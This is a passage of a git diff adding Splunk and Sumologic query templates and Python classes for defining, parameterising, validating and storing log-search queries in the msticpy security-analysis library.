+      | fields title, description, eai:acl.app, alert.severity, alert.track, alert_type, author, auto_summarize.cron_schedule, cron_schedule, id, is_scheduled, is_visible, qualifiedSearch, realtime_schedule, updated
+      '
+    parameters:
+  list_all_audittrail:
+    description: Retrieves all audit trail logs
+    metadata:
+      data_families: [audittrail]
+    args:
+      query: '
+      search index={index} source=audittrail timeformat={timeformat} earliest={start} latest={end}
+      | table timestamp, user, roles, action, info, search_type,  is_realtime, savedsearch_name, search, total_run_time, event_count, result_count
+      '
+    parameters:
+  get_events_parameterized:
+    description: Generic parameterized query from index/source
+    metadata:
+      data_families: [SplunkGeneral]
+    args:
+      query: '
+      search index={index} source={source} timeformat={timeformat} earliest={start} latest={end}
+      {project_fields}
+      {add_query_items}'
+    parameters:
\ No newline at end of file
diff --git a/msticpy/data/queries/sumologic_queries.yaml b/msticpy/data/queries/sumologic_queries.yaml
new file mode 100644
index 000000000..d9b94132e
--- /dev/null
+++ b/msticpy/data/queries/sumologic_queries.yaml
@@ -0,0 +1,49 @@
+metadata:
+  version: 1
+  description: Sumologic Queries
+  data_environments: [Sumologic]
+  data_families: [SumologicGeneral]
+  tags: ['alert', 'securityalert', 'process', 'account', 'network']
+defaults:
+  metadata:
+    data_source: 'bots'
+  parameters:
+    _index:
+      description: 'Sumologic index name'
+      type: str
+      default: '*'
+    _sourceCategory:
+      description: 'Sumologic sourceCategory type'
+      type: str
+      default: '*'
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    project_fields:
+      description: Project Field names
+      type: str
+      default: '| fields TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image, parent_process, ParentCommandLine, dest, Hashes'
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: '| top 100'
+    timeformat:
+      description: 'Datetime format to use in Sumologic query'
+      type: str
+      default: '"%Y-%m-%dT%H:%M:%S.%6N"'
+sources:
+  list_all_datatypes:
+    description: Summary of all events by sourceCategory
+    metadata:
+      data_families: [SumologicGeneral]
+    args:
+      query: '*
+      | format(_messagetime, "yyyy-MM-ddTHH:mm:ss") as date
+      | first(date), last(date) by _sourceCategory
+      | count _sourceCategory
+      | sort -_count
+      '
+    parameters:
diff --git a/msticpy/data/query_container.py b/msticpy/data/query_container.py
new file mode 100644
index 000000000..bcf09ce9c
--- /dev/null
+++ b/msticpy/data/query_container.py
@@ -0,0 +1,81 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Query hierarchy attribute class."""
+from functools import partial
+from typing import Any, Dict, Optional, Type
+
+from ..common.utility import check_kwarg
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class QueryContainer:
+    """Empty class used to create hierarchical attributes."""
+
+    _subclasses: Dict[str, Type] = {}
+
+    def __len__(self):
+        """Return number of items in the attribute collection."""
+        return len(self.__dict__)
+
+    def __iter__(self):
+        """Return iterator over the attributes."""
+        return iter(self.__dict__.items())
+
+    def __getattr__(self, name):
+        """Print usable error message if attribute not found."""
+        if "." in name:
+            try:
+                attr = _get_dot_attrib(self, name)
+            except KeyError:
+                pass
+            else:
+                return attr
+        nm_err: Optional[Exception] = None
+        try:
+            # check for similar-named attributes in __dict__
+            check_kwarg(name, list(self.__dict__.keys()))
+        except NameError as err:
+            nm_err = err
+        if nm_err:
+            raise AttributeError(
+                f"{self.__class__.__name__} object has no attribute {name}"
+            ) from nm_err
+        raise AttributeError(
+            f"{self.__class__.__name__} object has no attribute {name}"
+        )
+
+    def __repr__(self):
+        """Return list of attributes."""
+        repr_list = []
+        for name, obj in self.__dict__.items():
+            if isinstance(obj, QueryContainer):
+                repr_list.append(f"{name} (container)")
+            elif isinstance(obj, partial):
+                repr_list.append(f"{name} (query)")
+            elif not name.startswith("_"):
+                repr_list.append(f"{name} {type(obj).__name__}")
+        return "\n".join(repr_list)
+
+    def __call__(self, *args, **kwargs):
+        """Return list of attributes or help."""
+        if args or kwargs:
+            print("This attribute is a container, not a query.")
+            print("Items in this container:")
+        print(repr(self))
+
+
+def _get_dot_attrib(obj, elem_path: str) -> Any:
+    """Return attribute at dotted path."""
+    path_elems = elem_path.split(".")
+    cur_node = obj
+    for elem in path_elems:
+        cur_node = getattr(cur_node, elem, None)
+        if cur_node is None:
+            raise KeyError(f"{elem} value of {elem_path} is not a valid path")
+    return cur_node
diff --git a/msticpy/data/query_defns.py b/msticpy/data/query_defns.py
new file mode 100644
index 000000000..182cd5b54
--- /dev/null
+++ b/msticpy/data/query_defns.py
@@ -0,0 +1,202 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Query helper definitions."""
+from abc import ABC, abstractmethod
+from enum import Enum
+from typing import Union, List
+
+import pandas as pd
+
+from ..common.utility import export
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+@export
+class DataFamily(Enum):
+    """
+    Enumeration of data families.
+
+    Used to identify which queries are relevant for which
+    data sources.
+    """
+
+    Unknown = 0
+    WindowsSecurity = 1
+    LinuxSecurity = 2
+    SecurityAlert = 3
+    SecurityGraphAlert = 4
+    LinuxSyslog = 5
+    AzureNetwork = 6
+    MDATP = 7
+    Splunk = 8
+    ResourceGraph = 9
+    Sumologic = 10
+    Cybereason = 11
+
+    @classmethod
+    def parse(cls, value: Union[str, int]) -> "DataFamily":
+        """
+        Convert string or int to enum.
+
+        Parameters
+        ----------
+        value : Union[str, int]
+            value to parse
+
+        """
+        if isinstance(value, cls):
+            return value
+
+        parsed_enum = cls.Unknown
+        if isinstance(value, str):
+            try:
+                parsed_enum = cls[value]
+            except KeyError:
+                # match to value if case is incorrect
+                # pylint: disable=no-member
+                for e_name, e_val in cls.__members__.items():
+                    if e_name.upper() == value.upper():
+                        return e_val
+                return cls.Unknown
+                # pylint: enable=no-member
+        if isinstance(value, int):
+            try:
+                parsed_enum = cls(value)
+            except ValueError:
+                parsed_enum = cls.Unknown
+        return parsed_enum
+
+
+@export
+class DataEnvironment(Enum):
+    """
+    Enumeration of data environments.
+
+    Used to identify which queries are relevant for which
+    data sources.
+    """
+
+    Unknown = 0
+    AzureSentinel = 1  # alias of LogAnalytics
+    LogAnalytics = 1
+    MSSentinel = 1
+    Kusto = 2
+    AzureSecurityCenter = 3
+    SecurityGraph = 4
+    MDE = 5  # alias of MDATP
+    MDATP = 5
+    LocalData = 6
+    Splunk = 7
+    Mordor = 8
+    ResourceGraph = 9
+    Sumologic = 10
+    M365D = 11
+    Cybereason = 12
+
+    @classmethod
+    def parse(cls, value: Union[str, int]) -> "DataEnvironment":
+        """
+        Convert string or int to enum.
+
+        Parameters
+        ----------
+        value : Union[str, int]
+            value to parse
+
+        """
+        if isinstance(value, cls):
+            return value
+
+        parsed_enum = cls.Unknown
+        if isinstance(value, str):
+            try:
+                parsed_enum = cls[value]
+            except KeyError:
+                pass
+        if isinstance(value, int):
+            parsed_enum = cls(value)
+        return parsed_enum
+
+
+# pylint: disable=too-few-public-methods
+@export
+class QueryParamProvider(ABC):
+    """
+    Abstract type for QueryParamProvider.
+
+    Method query_params must be overridden by derived classes.
+
+    """
+
+    @property
+    @abstractmethod
+    def query_params(self):
+        """
+        Return dict of query parameters.
+
+        These parameters are sourced in the object
+        implementing this method.
+
+        Returns
+        -------
+            dict -- dictionary of query parameter values.
+
+        """
+        return {}
+
+
+def ensure_df_datetimes(
+    data: pd.DataFrame,
+    columns: Union[str, List[str], None] = None,
+    add_utc_tz: bool = True,
+) -> pd.DataFrame:
+    """
+    Return dataframe with converted TZ-aware timestamps.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input dataframe
+    columns : Union[str, List[str], None], optional
+        column (str) or list of columns to convert, by default None.
+        If this parameter is not supplied then any column containing
+        the substring "time" is used as a candidate for conversion.
+    add_utc_tz: bool, optional
+        If True any datetime columns in the `columns` parameter (
+        (or default `'.*time.*'` columns) that are timezone-naive,
+        will be converted to Timezone-aware timestamps marked as UTC.
+
+    Returns
+    -------
+    pd.DataFrame
+        Converted DataFrame.
+
+    """
+    if not columns:
+        columns = list(data.filter(regex=".*[Tt]ime.*").columns)
+    if isinstance(columns, str):
+        columns = [columns]
+    col_map = {
+        col: "datetime64[ns, UTC]"
+        for col in set(columns)
+        if col in data.columns and not pd.api.types.is_datetime64_any_dtype(data[col])
+    }
+    converted_data = data.astype(col_map, errors="ignore")
+
+    # Look for any TZ-naive columns in the list
+    if add_utc_tz:
+        localize_cols = {
+            col for col in columns if col in data.select_dtypes("datetime")
+        }
+        for col in localize_cols:
+            converted_data[col] = converted_data[col].dt.tz_localize(
+                "UTC", ambiguous="infer", nonexistent="shift_forward"
+            )
+    return converted_data
diff --git a/msticpy/data/query_source.py b/msticpy/data/query_source.py
new file mode 100644
index 000000000..6948120f4
--- /dev/null
+++ b/msticpy/data/query_source.py
@@ -0,0 +1,539 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Intake kql driver."""
+import re
+
+# from collections import ChainMap
+from datetime import datetime, timedelta
+from numbers import Number
+from typing import Any, Dict, List, Optional, Tuple, Union, Callable
+
+from dateutil.relativedelta import relativedelta
+from dateutil.parser import parse, ParserError  # type: ignore
+
+from ..common.utility import collapse_dicts
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _value_or_default(src_dict: Dict, prop_name: str, default: Dict):
+    """Return value from dict or emtpy dict."""
+    src_value = src_dict.get(prop_name)
+    return src_value if src_value is not None else default
+
+
+RD_UNIT_MAP = {
+    "y": "years",
+    "mon": "months",
+    "w": "weeks",
+    "d": "days",
+    "h": "hours",
+    "m": "minutes",
+    "s": "seconds",
+}
+
+
+# pylint: disable=too-many-instance-attributes
+class QuerySource:
+    """
+    Query definition class for templated queries.
+
+    Attributes
+    ----------
+    name: str
+        The query name
+    metadata: Dict[str, Any]
+        The consolidated metadata for the query
+    params: dict[str, Any]
+        The dictionary of parameter definitions for the query.
+    query_store: QueryStore
+        The query store object that the query belongs to
+
+    """
+
+    def __init__(
+        self,
+        name: str,
+        source: Dict[str, Any],
+        defaults: Dict[str, Any],
+        metadata: Dict[str, Any],
+    ):
+        """
+        Initialize query source definition.
+
+        Parameters
+        ----------
+        name : str
+            The query name
+        source : dict
+            The data source definition settings
+        defaults : dict
+            The default settings (if source-specific setting
+            not supplied)
+        metadata : dict
+            The global metadata from the source file.
+
+        Notes
+        -----
+        A data source can belong to multiple families (e.g. a query
+        that joins data from several sources)
+
+        """
+        self.name = name
+        self._source: Dict[str, Any] = source or {}
+        self.defaults: Dict[str, Any] = defaults or {}
+        self._global_metadata: Dict[str, Any] = dict(metadata) if metadata else {}
+        self.query_store: Optional["QueryStore"] = None  # type: ignore  # noqa: F821
+
+        # consolidate source metadata - source-specifc
+        # overrides global
+        # add an empty dict in case neither has defined params
+        # self.metadata = ChainMap(
+        #     _value_or_default(self._source, "metadata", {}),
+        #     _value_or_default(self.defaults, "metadata", {}),
+        #     self._global_metadata,
+        # )
+        self.metadata = collapse_dicts(
+            self._global_metadata,
+            self.defaults.get("metadata", {}),
+            self._source.get("metadata", {}),
+        )
+        # make ChainMap for parameters from with source
+        # higher priority than default
+        # add an empty dict in case neither has defined params
+        # self.params = ChainMap(
+        #     _value_or_default(self._source, "parameters", {}),
+        #     _value_or_default(self.defaults, "parameters", {}),
+        #     # self._source.get("parameters", {}),
+        #     # self.defaults.get("parameters", {}),
+        # )
+        self.params = collapse_dicts(
+            self.defaults.get("parameters", {}),
+            self._source.get("parameters", {}),
+        )
+
+        self._query: str = self["args.query"]
+        self._replace_query_macros()
+
+    def __getitem__(self, key: str):
+        """
+        Getitem override - allows access to properties via dotted notation.
+
+        Parameters
+        ----------
+        key : str
+            The hierarchical path to the property (e.g. `source.description`)
+
+        """
+        path_elems = key.split(".")
+        cur_node = self._source
+        for elem in path_elems:
+            cur_node = cur_node.get(elem, None)
+            if cur_node is None:
+                raise KeyError(f"{elem} value of {key} is not a valid path")
+        return cur_node
+
+    @property
+    def description(self) -> str:
+        """
+        Return description of the query.
+
+        Returns
+        -------
+        str
+            Query description.
+
+        """
+        try:
+            return self["description"]
+        except KeyError:
+            return "no description"
+
+    @property
+    def query(self) -> str:
+        """
+        Return the query template.
+
+        Returns
+        -------
+        str
+            The template query.
+
+        """
+        return self._query
+
+    @property
+    def default_params(self) -> Dict[str, dict]:
+        """
+        Return the set of parameters with default values.
+
+        Returns
+        -------
+        Iterable[dict]
+            List of parameters
+
+        """
+        return {
+            p_key: p_props
+            for p_key, p_props in self.params.items()
+            if "default" in p_props
+        }
+
+    @property
+    def required_params(self) -> Dict[str, dict]:
+        """
+        Return the set of parameters with no default values.
+
+        Returns
+        -------
+        Iterable[dict]
+            List of parameters
+
+        """
+        return {
+            p_key: p_props
+            for p_key, p_props in self.params.items()
+            if "default" not in p_props
+        }
+
+    @property
+    def data_families(self) -> List[str]:
+        """
+        Return the list of data families used by the query.
+
+        Returns
+        -------
+        List[str]
+            The list of data families. A data family is
+            usually equivalent to a table or entity set.
+
+        """
+        return self.metadata["data_families"]
+
+    def create_query(self, formatters: Dict[str, Callable] = None, **kwargs) -> str:
+        """
+        Return query with values from kwargs and defaults substituted.
+
+        Parameters
+        ----------
+        formatters : Dict[str, Callable]
+            Dictionary of custom parameter formatters indexed
+            by data type
+        kwargs: Mapping[str, Any]
+            Set of parameter name, value pairs used to
+            populate the template query.
+
+        Returns
+        -------
+        str
+            The populated query
+
+        Raises
+        ------
+        ValueError
+            If one or more parameters with no default values
+            are not supplied.
+
+        Notes
+        -----
+        Parameters supplied as arguments will override any
+        parameter defaults (see `default_params` property).
+
+        """
+        param_dict = {
+            name: value.get("default", None) for name, value in self.params.items()
+        }
+
+        param_dict.update(self.resolve_param_aliases(kwargs))
+        missing_params = {
+            name: value for name, value in param_dict.items() if value is None
+        }
+        if missing_params:
+            raise ValueError(
+                "These required parameters were not set: ", f"{missing_params.keys()}"
+            )
+
+        # Handle formatting for datetimes and cases where a format
+        # template has been supplied
+        for p_name, settings in self.params.items():
+            # These types may require custom extraction
+            if settings["type"] == "datetime":
+                param_dict[p_name] = self._convert_datetime(param_dict[p_name])
+            if settings["type"] == "list":
+                param_dict[p_name] = self._parse_param_list(param_dict[p_name])
+
+            # The parameter may need custom formatting
+            fmt_template = settings.get("format", None)
+            if fmt_template:
+                # custom formatting template in the query definition
+                param_dict[p_name] = fmt_template.format(param_dict[p_name])
+            elif settings["type"] == "datetime" and isinstance(
+                param_dict[p_name], datetime
+            ):
+                if formatters and "datetime" in formatters:
+                    param_dict[p_name] = formatters["datetime"](param_dict[p_name])
+                else:
+                    param_dict[p_name] = self._format_datetime_default(
+                        param_dict[p_name]
+                    )
+            elif settings["type"] == "list":
+                if formatters and "list" in formatters:
+                    param_dict[p_name] = formatters["list"](param_dict[p_name])
+                else:
+                    param_dict[p_name] = self._format_list_default(param_dict[p_name])
+
+        return self._query.format(**param_dict)
+
+    def _convert_datetime(self, param_value: Any) -> datetime:
+        if isinstance(param_value, datetime):
+            return param_value
+        if isinstance(param_value, Number):
+            # datetime specified as a number - we
+            # interpret this as an offset from utcnow
+            return datetime.utcnow() + timedelta(  # type: ignore
+                param_value  # type: ignore
+            )
+        try:
+            # If this is a simple integer we want to catch it before sending
+            # it to dateutil parser since this does the wrong thing with it.
+            int(param_value)
+            return self._calc_timeoffset(str(param_value))
+        except ValueError:
+            pass
+        try:
+            # Try to parse datetime with dateutil parser
+            return parse(param_value)
+        except ParserError:
+            # If none of these, assume a time delta
+            return self._calc_timeoffset(str(param_value))
+
+    def resolve_param_aliases(self, param_dict: Dict[str, Any]) -> Dict[str, Any]:
+        """Try to resolve any parameters in `param_dict` that are aliases."""
+        out_dict = {}
+        for param, value in param_dict.items():
+            if param in self.params:
+                out_dict[param] = value
+            else:
+                aliased_param = self._get_aliased_param(param)
+                if aliased_param:
+                    out_dict[aliased_param] = value
+                else:
+                    out_dict[param] = value
+        return out_dict
+
+    def _get_aliased_param(self, alias: str) -> Optional[str]:
+        """Return first parameter with a matching alias."""
+        aliased_params = {
+            p_name: p_prop
+            for p_name, p_prop in self.params.items()
+            if "aliases" in p_prop
+        }
+        for param, props in aliased_params.items():
+            if alias in props["aliases"]:
+                return param
+        return None
+
+    @classmethod
+    def _calc_timeoffset(cls, time_offset: str) -> datetime:
+        """Calculate date from offset specification."""
+        delta = time_offset.split("@")[0]
+        rounding = None
+        if "@" in time_offset:
+            rounding = time_offset.split("@")[1].casefold()
+
+        # Calculate the raw offset
+        t_delta = cls._parse_timedelta(delta)
+        result_date = datetime.utcnow() + t_delta
+
+        # If rounding to a specified unit (e.g. -3d@d)
+        if rounding:
+            # extract the date components into a list
+            rounded_dt = list(result_date.timetuple())[:6]
+            # round up if timedelta is positive or down if negative
+            round_down = time_offset.strip().startswith("-")
+            round_item = None
+            datetime_units = list(RD_UNIT_MAP.keys())
+            datetime_units.remove("w")
+            for dt_part, period in enumerate(datetime_units):
+                if round_item:
+                    rounded_dt[dt_part] = 0
+                if rounding.startswith(period):
+                    # once we match the period, set all subsequent values
+                    # to zero
+                    round_item = period
+            result_date = datetime(*rounded_dt)  # type: ignore
+            if not round_down:
+                # Use dateutil relativedelta to add one to whatever rounding
+                # unit was specified
+                units = RD_UNIT_MAP.get(round_item or "d", "days")
+                # expand dict to args for relativedelta
+                result_date = result_date + relativedelta(
+                    **({units: +1})  # type: ignore
+                )
+        return result_date
+
+    @staticmethod
+    def _parse_timedelta(time_range: str = "0") -> timedelta:
+        """Parse time period string and return equivalent timedelta."""
+        tr_regex = r"(?P<sign>[+\-]?)\s*(?P<value>[\d]+)\s*(?P<unit>([ywdhms]?|mon))"
+        m_time = re.match(tr_regex, time_range, re.IGNORECASE)
+
+        if not m_time or "value" not in m_time.groupdict():
+            return timedelta(0)
+        tm_val = int(m_time.groupdict()["sign"] + m_time.groupdict()["value"])
+        tm_unit = (
+            m_time.groupdict()["unit"].lower() if m_time.groupdict()["unit"] else "d"
+        )
+        # Use relative delta to build the timedelta based on the units
+        # in the time range expression
+        unit_param = RD_UNIT_MAP.get(tm_unit, "days")
+        # expand dict to args for relativedelta
+        return relativedelta(**({unit_param: tm_val}))  # type: ignore
+
+    @staticmethod
+    def _parse_param_list(param_value: Union[str, List]) -> List[Any]:
+        """Parse list, comma-delim str or str."""
+        if isinstance(param_value, list):
+            return param_value
+        if isinstance(param_value, str) and "," in param_value:
+            return [item.strip() for item in param_value.split(",")]
+        return [param_value]
+
+    @staticmethod
+    def _format_datetime_default(date_time: datetime) -> str:
+        return date_time.isoformat(sep="T") + "Z"
+
+    @staticmethod
+    def _format_list_default(item_list: List[Any]) -> str:
+        """Return formatted list parameter."""
+        fmt_list = []
+        for item in item_list:
+            if isinstance(item, str):
+                fmt_list.append(f"'{item}'")
+            else:
+                fmt_list.append(f"{item}")
+        return ",".join(fmt_list)
+
+    def help(self):
+        """Print help for query."""
+        print("Query: ", self.name)
+        if self.query_store is not None:
+            print("Data source: ", self.query_store.environment)
+        print(self.create_doc_string())
+        print("Query:")
+        print(self.query)
+
+    def create_doc_string(self) -> str:
+        """
+        Return a doc string for the query.
+
+        Returns
+        -------
+        str
+            New-line delimited docstring dynamically
+            created from query definition properties.
+
+        """
+        param_block = ["Parameters", "----------"]
+        for p_name, p_props in sorted(self.params.items()):
+            if "default" in p_props:
+                optional = " (optional)"
+                def_value = p_props["default"]
+                if isinstance(def_value, str) and len(def_value) > 50:
+                    def_value = def_value[:50] + "..."
+            else:
+                optional = ""
+                def_value = None
+            param_block.append(f'{p_name}: {p_props.get("type", "Any")}{optional}')
+            param_block.append(f'    {p_props.get("description", "no description")}')
+            if def_value:
+                param_block.append(f"    (default value is: {def_value})")
+            if "aliases" in p_props:
+                aliases = p_props["aliases"]
+                if isinstance(aliases, str):
+                    aliases = [aliases]
+                alias_list = ", ".join(f"'{alias}'" for alias in aliases)
+                param_block.append(f"    Aliases: {alias_list}")
+        doc_string = [f"{self.description}", ""]
+        return "\n".join(doc_string + param_block)
+
+    def validate(self) -> Tuple[bool, List[str]]:
+        """
+        Validate the source to ensure that all required properties are present.
+
+        Returns
+        -------
+        bool
+            True if validation is successful.
+
+        """
+        req_source_items = {"args"}
+        # match items surrounded by single {} but not double
+        param_pattern = r"{(?<!{{)(?!{)([^}]+)}(?!})(?<!}})"
+
+        valid_failures = []
+
+        # Need req_source_items AND query item to be present
+        source_props = self._source.keys() | self.defaults.keys()
+        if not req_source_items.issubset(source_props):
+            msg = (
+                f"Source {self.name} does not have all required "
+                + f"elements: {req_source_items - source_props}"
+            )
+            valid_failures.append(msg)
+        if not self._query:
+            msg = (
+                f'Source {self.name} does not have "query" property '
+                + "in args element."
+            )
+            valid_failures.append(msg)
+
+        # Now get the query and the parameter definitions from the source and
+        # check that every parameter specified in the query has a corresponding
+        # 'parameter definition in either the source or the defaults.
+        source_params = self.params.keys()
+        q_params = set(re.findall(param_pattern, self._query))
+
+        missing_params = q_params - source_params
+        if missing_params:
+            msg = (
+                f"Source {self.name} has parameters that are defined in "
+                + "the query but not included in either defaults or "
+                + "query-specific parameters element(s)\n"
+                + f"Missing parameters are {missing_params}"
+            )
+            valid_failures.append(msg)
+
+        missing_types = {
+            p_name for p_name, p_props in self.params.items() if "type" not in p_props
+        }
+        if missing_types:
+            msg = (
+                f"Source {self.name} has parameters that are defined in "
+                + 'the query but do not have a valid "type" property\n'
+                + f"Parameters with missing types are {missing_types}"
+            )
+            valid_failures.append(msg)
+        return (not valid_failures, valid_failures)
+
+    def _replace_query_macros(self):
+        """Replace any macro strings in the query with substitutions."""
+        replace_keys = re.findall(r"\$\<([^>]+)\>\$?", self._query)
+        if not replace_keys:
+            return
+        replace_values = {}
+        if "query_macros" in self._source:
+            replace_values = {
+                name: properties.get("value", "")
+                for name, properties in self["query_macros"].items()
+            }
+        for key in replace_keys:
+            if key in replace_keys:
+                replacement = replace_values.get(key, "")
+                self._query = self._query.replace(f"$<{key}>$", replacement)
+        self._query = re.sub("\n{2,}", "\n", self._query)
diff --git a/msticpy/data/query_store.py b/msticpy/data/query_store.py
new file mode 100644
index 000000000..17ba63251
--- /dev/null
+++ b/msticpy/data/query_store.py
@@ -0,0 +1,350 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""QueryStore class - holds a collection of QuerySources."""
+from collections import defaultdict
+from os import path
+from typing import Any, Dict, Iterable, Set, Union, Optional, List
+
+from ..common.exceptions import MsticpyUserConfigError
+from .._version import VERSION
+from .query_defns import DataEnvironment, DataFamily
+from .data_query_reader import find_yaml_files, read_query_def_file
+from .query_source import QuerySource
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def _get_dot_path(elem_path: str, data_map: dict) -> Any:
+    """
+    Return For dotted attribute, tries to search.
+
+    Parameters
+    ----------
+    elem_path : str
+        The attribute name or prefix.name
+    data_map : dict
+        The dictionary/map to search through.
+
+    Returns
+    -------
+    Any
+        The attribute value
+
+    Raises
+    ------
+    KeyError
+        If the key/subkey is not found
+
+    """
+    # if this is directly in the map return it
+    if elem_path in data_map:
+        return data_map[elem_path]
+    # otherwise partition into prefix and name
+    prefix, _, name = elem_path.rpartition(".")
+    attrib = data_map.get(prefix)
+    if isinstance(attrib, dict) and name in attrib:
+        return attrib[name]
+    raise KeyError(f"'{elem_path}' not found")
+
+
+class QueryStore:
+    """
+    Repository for query definitions for a data environment.
+
+    Attributes
+    ----------
+    environment: str
+        The data environment for the queries.
+    data_families: Dict[str, Dict[str, QuerySource]]
+        The set of data families and associated queries
+        for each.
+
+    """
+
+    def __init__(self, environment: str):
+        """
+        Intialize a QueryStore for a new environment.
+
+        Parameters
+        ----------
+        environment : str
+            The data environment
+
+        """
+        self.environment: str = environment
+        self.data_families: Dict[str, Dict[str, QuerySource]] = defaultdict(dict)
+        self.data_family_defaults: Dict[str, Dict[str, Any]] = defaultdict(dict)
+
+    def __getattr__(self, name: str):
+        """Return the item in dot-separated path `name`."""
+        return _get_dot_path(elem_path=name, data_map=self.data_families)
+
+    def __getitem__(self, key: str):
+        """Allow query retrieval using dotted key path."""
+        return _get_dot_path(elem_path=key, data_map=self.data_families)
+
+    @property
+    def query_names(self) -> Iterable[str]:
+        """
+        Return list of family.query in the store.
+
+        Returns
+        -------
+        Iterable[str]
+            List of queries
+
+        """
+        for family in sorted(self.data_families):
+
+            yield from [
+                f"{family}.{query}"
+                for query in sorted(self.data_families[family].keys())
+            ]
+
+    def add_data_source(self, source: QuerySource):
+        """
+        Add a datasource/query to the store.
+
+        Parameters
+        ----------
+        source : QuerySource
+            The source to add. An existing item with
+            the same name will be overwritten
+
+        """
+        source.query_store = self
+        for family in source.data_families:
+            self.data_families[family][source.name] = source
+            # we want to update any new defaults for the data family
+            self.data_family_defaults[family].update(source.defaults)
+
+            # we also replace the defaults dict in each source with
+            # a reference to the data family defaults so that as
+            # new files are read in defaults are shared by all sources.
+            source.defaults = self.data_family_defaults[family]
+
+            valid, failures = source.validate()
+            if not valid:
+                raise MsticpyUserConfigError(
+                    source.name,
+                    *failures,
+                    title="Error importing query definition file",
+                    help_uri=(
+                        "https://msticpy.readthedocs.io/en/latest/"
+                        + "data_acquisition/DataProviders.html#creating-new-queries"
+                    ),
+                )
+
+    def add_query(
+        self,
+        name: str,
+        query: str,
+        query_paths: Union[str, List[str]],
+        description: str = None,
+    ):
+        """
+        Add a query from name/query text.
+
+        Parameters
+        ----------
+        name : str
+            name of the query
+        query : str
+            The query string
+        query_paths : Union[str, List[str]]
+            The path/data_family to categorize.
+            Multiple paths can be specified. If the path is dotted,
+            this will cause the query to be displayed in the corresponding
+            hierarchy.
+        description : str, optional
+            Query description
+
+        """
+        prefix = ""
+        if "." in name:
+            prefix, _, name = name.rpartition(".")
+
+        if isinstance(query_paths, str):
+            query_paths = [query_paths]
+        if prefix:
+            query_paths = [f"{q_path}.{prefix}" for q_path in query_paths]
+
+        src_dict = {"args": {"query": query}, "description": description or name}
+        md_dict = {"data_families": query_paths}
+
+        query_source = QuerySource(
+            name=name, source=src_dict, defaults={}, metadata=md_dict
+        )
+        self.add_data_source(query_source)
+
+    def import_file(self, query_file: str):
+        """
+        Import a yaml data source definition.
+
+        Parameters
+        ----------
+        query_file : str
+            Path to the file to import
+
+        Raises
+        ------
+        ImportError
+            File read error or Syntax or semantic error found in
+            the source file.
+
+        """
+        sources, defaults, metadata = read_query_def_file(query_file)
+
+        for source_name, source in sources.items():
+            new_source = QuerySource(source_name, source, defaults, metadata)
+            self.add_data_source(new_source)
+
+    @classmethod  # noqa: MC0001
+    def import_files(  # noqa: MC0001
+        cls,
+        source_path: list,
+        recursive: bool = False,
+        driver_query_filter: Optional[Dict[str, Set[str]]] = None,
+    ) -> Dict[str, "QueryStore"]:
+        """
+        Import multiple query definition files from directory path.
+
+        Parameters
+        ----------
+        source_path : str
+            The folder containing the yaml definition files.
+        recursive : bool, optional
+            True to recurse sub-directories
+            (the default is False, which only reads from the top level)
+        driver_query_filter : Dict[str, Set[str]]
+            A dictionary of query metadata keys and values. This is used
+            to test each read query to see if it is relevant to the driver
+            and should be returned in the created QueryStore dictionary.
+
+        Returns
+        -------
+        Dict[str, 'QueryStore']
+            Dictionary of one or more environments and the
+            QueryStore containing the queries for each environment.
+
+        Raises
+        ------
+        FileNotFoundError
+            File read error or Syntax or semantic error found in
+            a source file.
+
+        """
+        env_stores: Dict[str, QueryStore] = {}
+        for query_dir in source_path:
+            if not path.isdir(query_dir):
+                raise FileNotFoundError(f"{query_dir} is not a directory")
+            for file_path in find_yaml_files(query_dir, recursive):
+                try:
+                    sources, defaults, metadata = read_query_def_file(str(file_path))
+                except ValueError:
+                    print(
+                        f"{file_path} is not a valid query definition file - skipping."
+                    )
+                    continue
+
+                for env_value in metadata["data_environments"]:
+                    if "." in env_value:
+                        env_value = env_value.split(".")[1]
+                    environment = DataEnvironment.parse(env_value)
+                    if environment == DataEnvironment.Unknown:
+                        raise ValueError(f"Unknown environment {env_value}")
+
+                    if environment.name not in env_stores:
+                        env_stores[environment.name] = cls(environment=environment.name)
+                    for source_name, source in sources.items():
+                        new_source = QuerySource(
+                            source_name, source, defaults, metadata
+                        )
+                        if not driver_query_filter or (
+                            driver_query_filter
+                            and _matches_driver_filter(new_source, driver_query_filter)
+                        ):
+                            env_stores[environment.name].add_data_source(new_source)
+        return env_stores
+
+    def get_query(
+        self, query_name: str, query_path: Union[str, DataFamily] = None
+    ) -> "QuerySource":
+        """
+        Return query with name `data_family` and `query_name`.
+
+        Parameters
+        ----------
+        query_name: str
+            Name of the query
+        query_path: Union[str, DataFamily]
+            The data family for the query
+
+        Returns
+        -------
+        QuerySource
+            Query matching name and family.
+
+        """
+        if query_path and isinstance(query_path, DataFamily):
+            query_path = query_path.name
+        if "." in query_name:
+            query_parts = query_name.split(".")
+            query_container = ".".join(query_parts[:-1])
+            query_name = query_parts[-1]
+            if query_container in self.data_families:
+                query_path = query_container
+            elif query_path:
+                query_container = ".".join(
+                    [query_path, query_container]  # type: ignore
+                )
+                if query_container in self.data_families:
+                    query_path = query_container
+        query = self.data_families.get(query_path, {}).get(query_name)  # type: ignore
+        if not query:
+            raise LookupError(f"Could not find {query_name} in path {query_path}.")
+        return query
+
